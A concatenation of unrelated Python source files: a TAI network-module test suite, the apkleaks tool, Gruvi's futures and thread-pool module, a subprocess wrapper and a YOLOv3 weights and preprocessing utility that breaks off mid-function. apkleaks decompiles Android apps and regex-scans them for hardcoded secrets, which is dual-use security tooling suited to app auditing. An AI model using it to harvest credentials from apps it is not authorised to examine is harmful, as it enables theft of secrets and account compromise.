self.assertEqual(len(module.netifs), 0)
self.assertEqual(len(module.hostifs), 0)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertEqual(int(m.get("num-network-interfaces")), 1)
self.assertEqual(int(m.get("num-host-interfaces")), 2)
cli.create("netif", [("index", 0)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.netifs), 1)
cli.create("hostif", [("index", 0)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 1)
cli.create("hostif", [("index", 1)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 2)
def test_get_set_multiple(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
v = hostif.get_multiple(["loopback-type", "fec-type"])
self.assertEqual(len(v), 2)
self.assertEqual(v[0], "none")
self.assertEqual(v[1], "none")
hostif.set_multiple([("loopback-type", "shallow"), ("fec-type", "rs")])
v = hostif.get_multiple(["loopback-type", "fec-type"])
self.assertEqual(len(v), 2)
self.assertEqual(v[0], "shallow")
self.assertEqual(v[1], "rs")
class TestTAIWithConfig(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen(
["taish_server", "-f", "config.json"], stderr=sp.STDOUT, stdout=sp.PIPE
)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def test_set_admin_status_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
self.assertEqual(m.get("admin-status"), "down")
m.set("admin-status", "up")
self.assertEqual(m.get("admin-status"), "up")
def test_set_custom_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
self.assertEqual(m.get("custom"), "true")
m.set("custom", "false")
self.assertEqual(m.get("custom"), "false")
def test_set_custom_list_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
m.set("custom-list", "1,2,3,4")
self.assertEqual(m.get("custom-list"), "1,2,3,4")
m.set("custom-list", "")
self.assertEqual(m.get("custom-list"), "")
def test_set_custom_list_attribute_module_taish(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
f"module {TAI_TEST_MODULE_LOCATION}; set custom-list 1,2,3,4",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertEqual(m.get("custom-list"), "1,2,3,4")
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
f"module {TAI_TEST_MODULE_LOCATION}; set custom-list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertEqual(m.get("custom-list"), "")
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
class TestTAIWithoutObjectCreation(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen(["taish_server", "-n"], stderr=sp.STDOUT, stdout=sp.PIPE)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def test_list(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.list()
self.assertNotEqual(m, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in m)
module = m[TAI_TEST_MODULE_LOCATION]
print("module oid: 0x{:x}".format(module.oid))
def test_taish_list(self):
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
"list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertNotEqual(output.stdout.decode(), "")
self.assertEqual(output.stderr.decode(), "")
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
if __name__ == "__main__":
unittest.main()
|
apkleaks.py | #!/usr/bin/env python3
from apkleaks.colors import clr
from contextlib import closing
from distutils.spawn import find_executable
from pyaxmlparser import APK
from urllib.request import urlopen
from zipfile import ZipFile
import io
import json
import logging.config
import mimetypes
import numpy
import os
import re
import shutil
import sys
import tempfile
import threading
class APKLeaks:
def __init__(self, args):
self.file = args.file
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".txt", prefix=self.prefix)[1] if args.output is None else args.output
self.pattern = self.main_dir + "/../config/regexes.json" if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else self.main_dir + "/../jadx/bin/jadx%s" % (".bat" if os.name == "nt" else "")
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(self.main_dir + "/../jadx")
os.chmod(self.jadx, 33268)  # 0o100764: mark the downloaded jadx binary executable
def write(self, message, color):
sys.stdout.write("%s%s%s" % (color, message, clr.ENDC))
def writeln(self, message, color):
self.write(message + "\n", color)
def integrity(self):
if os.path.exists(self.jadx) is False:
self.writeln("Can't find jadx binary.", clr.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
self.write("Do you want to download jadx? (Y/n) ", clr.OKBLUE)
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
self.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", clr.WARNING)
if choice:
self.writeln("** Downloading jadx...\n", clr.OKBLUE)
self.dependencies()
else:
sys.exit(self.writeln("Aborted.", clr.FAIL))
if os.path.isfile(self.file) is True:
try:
self.apk = self.apk_info()
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
else:
return self.apk
else:
sys.exit(self.writeln("It's not a valid file!", clr.WARNING))
def decompile(self):
self.writeln("** Decompiling APK...", clr.OKBLUE)
with ZipFile(self.file) as zipped:
try:
dex = self.tempdir + "/" + self.apk.package + ".dex"
with open(dex, "wb") as classes:
classes.write(zipped.read("classes.dex"))
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
dec = "%s %s -d %s --deobf" % (self.jadx, dex, self.tempdir)
os.system(dec)
return self.tempdir
def unique(self, items):
x = numpy.array(items)
return numpy.unique(x)
def finder(self, pattern, path):
matcher = re.compile(pattern)
found = []
for path, _, files in os.walk(path):
for fn in files:
filepath = os.path.join(path, fn)
if mimetypes.guess_type(filepath)[0] is None:
continue
with open(filepath) as handle:
for lineno, line in enumerate(handle):
mo = matcher.search(line)
if mo:
found.append(mo.group())
return self.unique(found)
def extract(self, name, matches):
output = open(self.output, "a+")
if matches:
stdout = ("[%s]" % (name))
self.writeln("\n" + stdout, clr.OKGREEN)
output.write(stdout + "\n")
for secret in matches:
if name == "LinkFinder" and re.match(r"^.(L[a-z]|application|audio|fonts|image|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
stdout = ("- %s" % (secret))
print(stdout)
output.write(stdout + "\n")
output.write("\n")
output.close()
def scanning(self):
self.writeln("\n** Scanning against '%s'" % (self.apk.package), clr.OKBLUE)
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for p in pattern:
thread = threading.Thread(target = self.extract, args = (name, self.finder(p, self.tempdir)))
thread.start()
else:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
def __del__(self):
print("%s\n** Results saved into '%s%s%s%s'%s" % (clr.OKBLUE, clr.ENDC, clr.OKGREEN, self.output, clr.OKBLUE, clr.ENDC))
try:
shutil.rmtree(self.tempdir)
except Exception:
return |
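# Illustrative sketch (not part of apkleaks): the core of finder() above --
# walk a tree, regex-scan readable files, de-duplicate matches. The pattern
# and the path are made-up examples.
def _finder_demo():
    import os, re
    matcher = re.compile(r'AKIA[0-9A-Z]{16}')  # example AWS key pattern
    found = set()
    for root, _, files in os.walk('/tmp/decompiled'):  # hypothetical path
        for fn in files:
            with open(os.path.join(root, fn), errors='ignore') as handle:
                for line in handle:
                    mo = matcher.search(line)
                    if mo:
                        found.add(mo.group())
    return sorted(found)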
futures.py | #
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import sys
import time
import threading
import pyuv
from . import fibers, compat, logging, util
from .hub import switchpoint, switch_back
from .sync import Event, Queue
from .errors import Timeout, Cancelled
from .callbacks import add_callback, remove_callback, run_callbacks
__all__ = ['Future', 'PoolBase', 'FiberPool', 'ThreadPool', 'get_io_pool',
'get_cpu_pool', 'blocking', 'wait', 'as_completed']
class Future(object):
"""The state of an asynchronous function call.
A future captures the state and the future result of an asynchronous
function call. Futures are not instantiated directly but are created by a
:class:`PoolBase` implementation. The pool accepts work in the form of a
Python function via its :meth:`~PoolBase.submit` method. This method
returns a future representing the state and the result of the function that
will be executed asynchronously in the pool.
A future progresses through different states during its lifecycle:
* Initially the future is in the pending state.
* Once the pool has capacity to run the function, it moves to the running
state. In this state, :meth:`~Future.running` will return ``True``.
* Once the function completes or raises an exception, the future moves to
the done state. In this state, :meth:`~Future.done` will return ``True``.
The future and the asynchronous function it represents are two distinct
entities but for brevity the terms are often used interchangeably,
including in this manual. For example, if the asynchronous function
completes it is said that the future has completed, and cancelling the
future really means cancelling the asynchronous function it is capturing
the state of.
"""
__slots__ = ('_result', '_state', '_lock', '_done', '_callbacks')
S_PENDING, S_RUNNING, S_RUNNING_NOCANCEL, S_DONE, S_EXCEPTION = range(5)
def __init__(self):
self._result = None
self._state = self.S_PENDING
self._lock = threading.Lock()
self._done = Event()
self._callbacks = None
def running(self):
"""Return whether this future is running. """
return self._state in (self.S_RUNNING, self.S_RUNNING_NOCANCEL)
def cancelled(self):
"""Return whether this future was successfully cancelled."""
return self._state == self.S_EXCEPTION and isinstance(self._result, Cancelled)
def done(self):
"""Return whether this future is done."""
return self._state in (self.S_DONE, self.S_EXCEPTION)
def cancel(self):
"""Cancel the execution of the async function, if possible.
This method marks the future as done and sets the :class:`Cancelled`
exception.
A future that is not running can always be cancelled. However when a
future is running, the ability to cancel it depends on the pool
implementation. For example, a fiber pool can cancel running fibers but
a thread pool cannot.
Return ``True`` if the future could be cancelled, ``False`` otherwise.
"""
# We leverage/abuse our _done Event's thread lock as our own lock.
# Since it's a private copy it should be OK, and it saves some memory.
# Just be sure that we don't modify the event with the lock held.
with self._lock:
if self._state not in (self.S_PENDING, self.S_RUNNING):
return False
self._result = Cancelled('cancelled by Future.cancel()')
self._state = self.S_EXCEPTION
self._done.set()
return True
@switchpoint
def result(self, timeout=None):
"""Wait for the future to complete and return its result.
If the function returned normally, its return value is returned here.
If the function raised an exception, the exception is re-raised here.
"""
if not self._done.wait(timeout):
raise Timeout('timeout waiting for future')
# No more state changes after _done is set so no lock needed.
if self._state == self.S_EXCEPTION:
raise compat.saved_exc(self._result)
return self._result
@switchpoint
def exception(self, timeout=None):
"""Wait for the async function to complete and return its exception.
If the function did not raise an exception this returns ``None``.
"""
if not self._done.wait(timeout):
raise Timeout('timeout waiting for future')
if self._state == self.S_EXCEPTION:
return self._result
def add_done_callback(self, callback, *args):
"""Add a callback that gets called when the future completes.
The callback will be called in the context of the fiber that sets the
future's result. The callback is called with the positional arguments
*args* provided to this method.
The return value is an opaque handle that can be used with
:meth:`~gruvi.Future.remove_done_callback` to remove the callback.
If the future has already completed, then the callback is called
immediately from this method and the return value will be ``None``.
"""
with self._lock:
if self._state not in (self.S_DONE, self.S_EXCEPTION):
return add_callback(self, callback, args)
callback(*args)
def remove_done_callback(self, handle):
"""Remove a callback that was added by :meth:`~Future.add_done_callback`.
It is not an error to remove a callback that was already removed.
"""
with self._lock:
remove_callback(self, handle)
# The following are internal functions used by the pool implementations.
def set_running(self, can_cancel=False):
# Set the future in the running state.
with self._lock:
if self._state != self.S_PENDING:
return
self._state = self.S_RUNNING if can_cancel else self.S_RUNNING_NOCANCEL
def set_result(self, result):
# Mark the future as done and set its result. If the future has already
# completed, then this does nothing.
with self._lock:
if self._state in (self.S_DONE, self.S_EXCEPTION):
return
self._result = result
self._state = self.S_DONE
self._done.set()
run_callbacks(self)
def set_exception(self, exception):
# Mark the future as done and set an exception. If the future has
# already completed, then this does nothing.
with self._lock:
if self._state in (self.S_DONE, self.S_EXCEPTION):
return
self._result = exception
self._state = self.S_EXCEPTION
self._done.set()
run_callbacks(self)
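# Illustrative sketch (not part of gruvi): driving the Future state machine
# above by hand, the way a pool implementation does.
def _future_demo():
    fut = Future()
    fut.set_running(can_cancel=True)
    assert fut.running() and not fut.done()
    fut.set_result(42)
    assert fut.done() and not fut.cancelled()
    # A second completion is ignored; the first result wins.
    fut.set_exception(RuntimeError('too late'))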
class PoolBase(object):
"""Base class for pools.
A pool contains a set of workers that can execute function calls
asynchronously.
"""
_PoolClosing = object()
def __init__(self, maxsize=None, minsize=0, name=None):
"""
The *maxsize* argument specifies the maximum numbers of workers that
will be created in the pool. If *maxsize* is ``None`` then the pool can
grow without bound.
Normally the pool starts with zero workers and grows up to *maxsize* on
demand. The *minsize* parameter can be used to change this behavior and
make sure that there will always be at least this many workers in the
pool.
The *name* parameter gives a name for this pool. The pool name will
show up in log messages related to the pool.
"""
self._maxsize = maxsize
self._name = name or util.objref(self)
self._minsize = minsize
self._log = logging.get_logger()
self._workers = set()
# We never switch while holding the lock which means we can use a
# threading lock which is more efficient than a fiber lock.
self._lock = threading.Lock()
self._queue = Queue()
self._closing = False
self._closed = Event()
self._next_worker = 0
for i in range(self._minsize):
self._spawn_worker()
if self._minsize:
self._log.debug('pre-spawned {} workers', self._minsize)
@property
def maxsize(self):
"""The maximum size of this pool."""
return self._maxsize
@property
def minsize(self):
"""The minimum size of this pool."""
return self._minsize
@property
def name(self):
"""The pool name."""
return self._name
def _current_worker(self):
raise NotImplementedError
def _create_worker(self):
raise NotImplementedError
def _start_work(self, fut):
raise NotImplementedError
def _worker_main(self):
# Main function for each worker in the pool.
work = None
try:
while True:
work = self._queue.get()
try:
if work is self._PoolClosing:
self._log.debug('worker shutting down')
break
func, args, fut = work
if fut.cancelled():
continue # Future was cancelled before it could be run.
self._start_work(fut)
try:
result = func(*args)
fut.set_result(result)
except Cancelled as e:
self._log.debug('worker was cancelled ({!s})', e)
# The future might have cancelled itself so make sure
# to set the exception, possibly unnecessarily.
fut.set_exception(e)
except:
# OK to catch all since we will exit.
self._log.debug('uncaught exception in worker', exc_info=True)
fut.set_exception(sys.exc_info()[1])
break
finally:
self._queue.task_done()
finally:
with self._lock:
self._workers.remove(self._current_worker())
if work is self._PoolClosing and self._workers:
self._queue.put_nowait(work)
elif work is self._PoolClosing:
self._closed.set()
else:
self._spawn_workers()
def _spawn_worker(self):
# Spawn a single new worker. The lock must be held.
name = '{}:{}'.format(self._name, self._next_worker)
self._next_worker += 1
self._workers.add(self._create_worker(name))
def _spawn_workers(self):
# Spawn new workers if required. The lock must be held.
# Note that holding the lock prevents work from being added to the
# queue but not from being drained. The result is that the value of
# 'tospawn' we calculate below may be too high. However, since we limit
# the number of workers we spin up in one batch, this is not a big deal
# and actually simplifies the overall locking significantly (we cannot
# do a _queue._get() under a plain lock as it might block the thread).
nworkers = len(self._workers)
queued = self._queue.qsize()
active_workers = self._queue.unfinished_tasks - queued
idle_workers = nworkers - active_workers
wanted = max(0, queued - idle_workers, self._minsize - nworkers)
mayspawn = max(0, (self._maxsize or (nworkers + wanted)) - nworkers)
tospawn = min(10, wanted, mayspawn)
for i in range(tospawn):
self._spawn_worker()
if tospawn:
self._log.debug('spawned {} workers, total = {}', tospawn, len(self._workers))
def submit(self, func, *args):
"""Run *func* asynchronously.
The function is submitted to the pool, which runs it asynchronously. The
function is called with positional arguments *args*.
The return value is a :class:`Future` that captures the state and the
future result of the asynchronous function call.
"""
with self._lock:
if self._closing:
raise RuntimeError('pool is closing/closed')
result = Future()
self._queue.put_nowait((func, args, result))
self._spawn_workers()
return result
@switchpoint
def map(self, func, *iterables, **kwargs):
"""Apply *func* to the elements of the sequences in *iterables*.
All invocations of *func* are run in the pool. If multiple iterables
are provided, then *func* must take this many arguments, and is applied
with one element from each iterable. All iterables must yield the same
number of elements.
An optional *timeout* keyword argument may be provided to specify a
timeout.
This returns a generator yielding the results.
"""
with self._lock:
if self._closing:
raise RuntimeError('pool is closing/closed')
timeout = kwargs.pop('timeout', None)
futures = []
for args in zip(*iterables):
result = Future()
self._queue.put_nowait((func, args, result))
futures.append(result)
self._spawn_workers()
try:
with switch_back(timeout):
for future in futures:
yield future.result()
except Exception:
# Timeout, GeneratorExit or future.set_exception()
for future in futures:
if not future.done():
future.cancel()
raise
@switchpoint
def join(self):
"""Wait until all jobs in the pool have completed.
New submissions are not blocked. This means that if you continue adding
work via :meth:`~PoolBase.submit` or :meth:`~PoolBase.map` then this
method might never finish.
"""
self._queue.join()
@switchpoint
def close(self):
"""Close the pool and wait for all workers to exit.
New submissions will be blocked. Workers will exit once their current
job is finished. This method will return after all workers have exited.
"""
with self._lock:
if self._closing:
return
self._closing = True
if not self._workers:
self._closed.set()
return
self._queue.put_nowait(self._PoolClosing)
self._closed.wait()
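# Illustrative sketch (not part of gruvi): typical pool usage, assuming a
# running gruvi hub so the switchpoints in result()/map() can switch.
def _pool_demo():
    pool = ThreadPool(maxsize=2, name='demo')
    fut = pool.submit(pow, 2, 10)
    print(fut.result())                             # -> 1024
    print(list(pool.map(len, ['a', 'bb', 'ccc'])))  # -> [1, 2, 3]
    pool.close()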
class FiberPool(PoolBase):
"""A pool that uses fiber workers."""
def __init__(self, *args, **kwargs):
# Provided in order not to repeat the PoolBase.__init__ doc string.
super(FiberPool, self).__init__(*args, **kwargs)
def _current_worker(self):
return fibers.current_fiber()
def _create_worker(self, name):
fiber = fibers.Fiber(self._worker_main, name=name)
fiber.start()
return fiber
def _cancel_fiber(self, fut, fiber):
if fut.cancelled():
fiber.cancel()
def _start_work(self, fut):
fut.set_running(True)
fut.add_done_callback(self._cancel_fiber, fut, self._current_worker())
Pool = FiberPool
class ThreadPool(PoolBase):
"""A pool that uses thread workers."""
def __init__(self, *args, **kwargs):
# Provided in order not to repeat the PoolBase.__init__ doc string.
super(ThreadPool, self).__init__(*args, **kwargs)
def _current_worker(self):
return threading.current_thread()
def _create_worker(self, name):
thread = threading.Thread(target=self._worker_main, name=name)
# Mark the threads in the pool as daemonic. This allows the program to
# exit if the user did not close() the pool. This is useful especially
# because there's implicitly created pools (the IO and thread pool) and
# we cannot expect the user to close those.
thread.daemon = True
thread.start()
return thread
def _start_work(self, fut):
fut.set_running(False)
# A newly constructed pool doesn't start any workers until they are needed.
# This makes it OK to instantiate the pools ahead of time.
_io_pool = ThreadPool(20, name='Io')
_cpu_pool = ThreadPool(len(pyuv.util.cpu_info()), name='Cpu')
def get_io_pool():
"""Return the thread pool for IO tasks.
By default there is one IO thread pool per application, which is shared
with all threads.
"""
return _io_pool
def get_cpu_pool():
"""Return the thread pool for CPU intenstive tasks.
By default there is one CPU thread pool per application, which it is shared
with all threads.
"""
return _cpu_pool
def blocking(func, *args, **kwargs):
"""Run a function that uses blocking IO.
The function is run in the IO thread pool.
"""
pool = get_io_pool()
fut = pool.submit(func, *args, **kwargs)
return fut.result()
@switchpoint
def _wait(pending, timeout):
# An iterator/generator that waits for objects in the list *pending*,
# yielding them as they become ready. The pending list is mutated.
done = []
have_items = Event()
def callback(i):
done.append(pending[i])
pending[i] = None
have_items.set()
handles = [pending[i].add_done_callback(callback, i) for i in range(len(pending))]
if timeout is not None:
end_time = time.time() + timeout
try:
while pending:
if timeout is not None:
timeout = max(0, end_time - time.time())
if not have_items.wait(timeout):
raise Timeout('timeout waiting for objects')
i = 0
while i < len(done):
yield done[i]
i += 1
del done[:]
have_items.clear()
finally:
for i in range(len(pending)):
if pending[i] is not None:
pending[i].remove_done_callback(handles[i])
@switchpoint
def as_completed(objects, count=None, timeout=None):
"""Wait for one or more waitable objects, yielding them as they become
ready.
This is the iterator/generator version of :func:`wait`.
"""
for obj in objects:
if not hasattr(obj, 'add_done_callback'):
raise TypeError('Expecting sequence of waitable objects')
if count is None:
count = len(objects)
if count < 0 or count > len(objects):
raise ValueError('count must be between 0 and len(objects)')
if count == 0:
return
pending = list(objects)
for obj in _wait(pending, timeout):
yield obj
count -= 1
if count == 0:
break
@switchpoint
def wait(objects, count=None, timeout=None):
"""Wait for one or more waitable objects.
This method waits until *count* elements from the sequence of waitable
objects *objects* have become ready. If *count* is ``None`` (the default),
then wait for all objects to become ready.
What "ready" is means depends on the object type. A waitable object is a
objects that implements the ``add_done_callback()`` and
``remove_done_callback`` methods. This currently includes:
* :class:`~gruvi.Event` - an event is ready when its internal flag is set.
* :class:`~gruvi.Future` - a future is ready when its result is set.
* :class:`~gruvi.Fiber` - a fiber is ready when has terminated.
* :class:`~gruvi.Process` - a process is ready when the child has exited.
"""
for obj in objects:
if not hasattr(obj, 'add_done_callback'):
raise TypeError('Expecting sequence of waitable objects')
if count is None:
count = len(objects)
if count < 0 or count > len(objects):
raise ValueError('count must be between 0 and len(objects)')
if count == 0:
return [], objects
pending = list(objects)
done = []
try:
for obj in _wait(pending, timeout):
done.append(obj)
if len(done) == count:
break
except Timeout:
pass
return done, list(filter(bool, pending))
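# Illustrative sketch (not part of gruvi): wait() and as_completed() accept
# any objects exposing add_done_callback()/remove_done_callback(), such as
# the futures returned by a pool.
def _wait_demo():
    pool = get_cpu_pool()
    futures = [pool.submit(pow, n, 2) for n in range(5)]
    done, pending = wait(futures, timeout=5.0)
    for fut in as_completed(futures):
        print(fut.result())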
|
process.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module is used to execute the shell script.
"""
import os
import subprocess
import threading
class Process(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def process_cmd(self):
try:
self.process = subprocess.Popen("exec " + self.cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
return self.process
except Exception:
return None
def process_cmd_asyc_end(self, key_word):
self.stop_thread.set()
stop_cmd = "ps -ef | grep '" + key_word + "' | grep -v grep | awk '{print $2}' | xargs kill"
print(stop_cmd)
os.popen(stop_cmd)
def process_cmd_asyc(self):
self.stop_thread = threading.Event()
self.process = subprocess.Popen(self.cmd,
bufsize=0,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True)
print(self.process.pid)
proc_thread = threading.Thread(target=self.read, args=(self.process,))
proc_thread.start()
def read(self, process):
while not self.stop_thread.is_set():
output = process.stdout.readline().decode("UTF-8")
# TODO: should add the logic to record the log info here. This will be addressed by issue ID #33
print(output.strip())
if output == "" and self.process.poll() is not None:
break
def get_process(self):
return self.process
def get_process_result(self):
self.process_cmd()
return self.process.communicate()[0].decode("UTF-8")
def get_process_list(self):
self.process_cmd()
res = self.process.communicate()[0].decode("UTF-8")
return res if res is not None else ""
def get_process_content(self):
self.process_cmd()
# Popen objects have no check_out(); read stdout via communicate() instead.
out, _ = self.process.communicate()
return out.decode("UTF-8")
@staticmethod
def execute_command(cmd):
process = subprocess.Popen("exec " + cmd, bufsize=0, shell=True, stdout=subprocess.PIPE)
process.communicate()
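# Illustrative sketch (not part of this module): running a command through
# Process and reading its output. The command is an arbitrary example.
def _process_demo():
    proc = Process('echo hello')
    print(proc.get_process_result())  # -> 'hello\n'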
|
utils.py | #================================================================
#
# File name : utils.py
# Author : PyLessons
# Created date: 2020-09-27
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : additional yolov3 and yolov4 functions
#
#================================================================
from multiprocessing import Process, Queue, Pipe
import cv2
import time
import random
import colorsys
import numpy as np
import tensorflow as tf
from yolov3.configs import *
from yolov3.yolov4 import *
from tensorflow.python.saved_model import tag_constants
def load_yolo_weights(model, weights_file):
tf.keras.backend.clear_session() # used to reset layer names
# load Darknet original weights to TensorFlow model
if YOLO_TYPE == "yolov3":
range1 = 75 if not TRAIN_YOLO_TINY else 13
range2 = [58, 66, 74] if not TRAIN_YOLO_TINY else [9, 12]
if YOLO_TYPE == "yolov4":
range1 = 110 if not TRAIN_YOLO_TINY else 21
range2 = [93, 101, 109] if not TRAIN_YOLO_TINY else [17, 20]
with open(weights_file, 'rb') as wf:
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
j = 0
for i in range(range1):
if i > 0:
conv_layer_name = 'conv2d_%d' %i
else:
conv_layer_name = 'conv2d'
if j > 0:
bn_layer_name = 'batch_normalization_%d' %j
else:
bn_layer_name = 'batch_normalization'
conv_layer = model.get_layer(conv_layer_name)
filters = conv_layer.filters
k_size = conv_layer.kernel_size[0]
in_dim = conv_layer.input_shape[-1]
if i not in range2:
# darknet weights: [beta, gamma, mean, variance]
bn_weights = np.fromfile(wf, dtype=np.float32, count=4 * filters)
# tf weights: [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
bn_layer = model.get_layer(bn_layer_name)
j += 1
else:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, k_size, k_size)
conv_weights = np.fromfile(wf, dtype=np.float32, count=np.prod(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(conv_shape).transpose([2, 3, 1, 0])
if i not in range2:
conv_layer.set_weights([conv_weights])
bn_layer.set_weights(bn_weights)
else:
conv_layer.set_weights([conv_weights, conv_bias])
assert len(wf.read()) == 0, 'failed to read all data'
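# Illustrative sketch (not part of the original file): the row reindexing
# above converts Darknet's [beta, gamma, mean, variance] ordering into the
# [gamma, beta, mean, variance] ordering that Keras BatchNormalization
# expects.
def _bn_reorder_demo():
    import numpy as np
    darknet = np.arange(8).reshape(4, 2)  # rows: beta, gamma, mean, variance
    keras_order = darknet[[1, 0, 2, 3]]   # rows: gamma, beta, mean, variance
    print(keras_order[0])                 # -> the gamma row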
def Load_Yolo_model():
gpus = tf.config.experimental.list_physical_devices('GPU')
if len(gpus) > 0:
print(f'GPUs {gpus}')
try: tf.config.experimental.set_memory_growth(gpus[0], True)
except RuntimeError: pass
if YOLO_FRAMEWORK == "tf": # TensorFlow detection
if YOLO_TYPE == "yolov4":
Darknet_weights = YOLO_V4_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V4_WEIGHTS
if YOLO_TYPE == "yolov3":
Darknet_weights = YOLO_V3_TINY_WEIGHTS if TRAIN_YOLO_TINY else YOLO_V3_WEIGHTS
if not YOLO_CUSTOM_WEIGHTS:
print("Loading Darknet_weights from:", Darknet_weights)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=YOLO_COCO_CLASSES)
load_yolo_weights(yolo, Darknet_weights) # use Darknet weights
else:
print("Loading custom weights from:", YOLO_CUSTOM_WEIGHTS)
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE, CLASSES=TRAIN_CLASSES)
yolo.load_weights(f"./checkpoints/{TRAIN_MODEL_NAME}") # use custom weights
elif YOLO_FRAMEWORK == "trt": # TensorRT detection
saved_model_loaded = tf.saved_model.load(YOLO_CUSTOM_WEIGHTS, tags=[tag_constants.SERVING])
signature_keys = list(saved_model_loaded.signatures.keys())
yolo = saved_model_loaded.signatures['serving_default']
return yolo
def image_preprocess(image, target_size, gt_boxes=None):
ih, iw = target_size
h, w, _ = image.shape
scale = min(iw/w, ih/h)
nw, nh = int(scale * w), int(scale * h)
image_resized = cv2.resize(image, (nw, nh))
image_paded = np.full(shape=[ih, iw, 3], fill_value=128.0)
dw, dh = (iw - nw) // 2, (ih-nh) // 2
image_paded[dh:nh+dh, dw:nw+dw, :] = image_resized
image_paded = image_paded / 255.
if gt_boxes is None:
return image_paded
else:
gt_boxes[:, [0, 2]] = gt_boxes[:, [0, 2]] * scale + dw
